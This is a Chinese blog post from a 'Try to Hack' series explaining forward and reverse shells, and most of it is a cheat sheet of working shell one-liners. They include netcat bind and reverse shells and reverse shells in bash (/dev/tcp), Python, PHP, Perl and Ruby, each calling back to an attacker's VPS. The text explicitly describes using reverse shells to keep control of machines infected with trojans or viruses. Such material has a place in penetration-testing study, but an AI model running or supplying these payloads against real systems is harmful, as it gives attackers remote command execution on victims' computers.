【Try to Hack】正向shell和反向shell
正向shell:控制端主动发起连接去连接被控制端反向shell:被控制端主动连接控制端(大多数情况为连接vps,因为攻击者电脑通常没有公网IP所以不能进行连接)大多采用反向shell。在渗透环境中,通常由于被控端因防火墙受限、权限不足、端口被占用等情形。会导致通常进入被控制端的数据包会被拦截等原因的无法连接。而被控制端主动向外发送的数据包通常都不会被拦截。反向shell就是控制端监听在某TCP/U
📒博客主页:开心星人的博客主页
🔥系列专栏:Try to Hack
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年6月26日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!
文章内容均来自互联网,仅作为自己学习的使用。更多内容看这篇
正向shell和反向shell
正向shell:控制端主动发起连接去连接被控制端
反向shell:被控制端主动连接控制端(大多数情况为连接vps,因为攻击者电脑通常没有公网IP所以不能进行连接)
大多采用反向shell。在渗透环境中,通常由于被控端因防火墙受限、权限不足、端口被占用等情形。会导致通常进入被控制端的数据包会被拦截等原因的无法连接。而被控制端主动向外发送的数据包通常都不会被拦截。
反向shell就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端
什么时候进行反向shell?
1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。
2.它的ip会动态改变,你不能持续控制。
3.由于防火墙等限制,对方机器只能发送请求,不能接收请求。
4.对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。
正向shell
目标主机上打开4444端口
nc -lvp 4444 -e /bin/bash // linux
nc -lvp 4444 -e c:\windows\system32\cmd.exe // windows
在本地或者VPS主机上连接目标主机的4444端口
nc 目标主机ip 4444
反向shell
在本地或者VPS主机上监听本地9999端口
nc -lvp 9999
目标主机上输入如下命令,连接VPS或主机的9999端口
nc vps或主机的ip 9999 -e /bin/sh //linux
nc vps或主机的ip -e c:\windows\system32\cmd.exe //windows
在目标主机中没有nc时获取反向shell
VPS或本地主机上监听2222端口
nc -lvp 2222
python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("vps或本地主机的ip",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
bash
bash -i >& /dev/tcp/vps或本地主机的ip/2222 0>&1
php
php -r '$sock=fsockopen("vps或本地主机的ip",2222);exec("/bin/bash -i 0>&3 1>&3 2>&3");'
perl
perl -e 'use Socket;$i="vps或本地主机的ip";$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
ruby
ruby -rsocket -e 'c=TCPSocket.new("vps或本地主机的ip","2222");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
或
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("vps或本地主机的ip","2222");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
更多推荐
所有评论(0)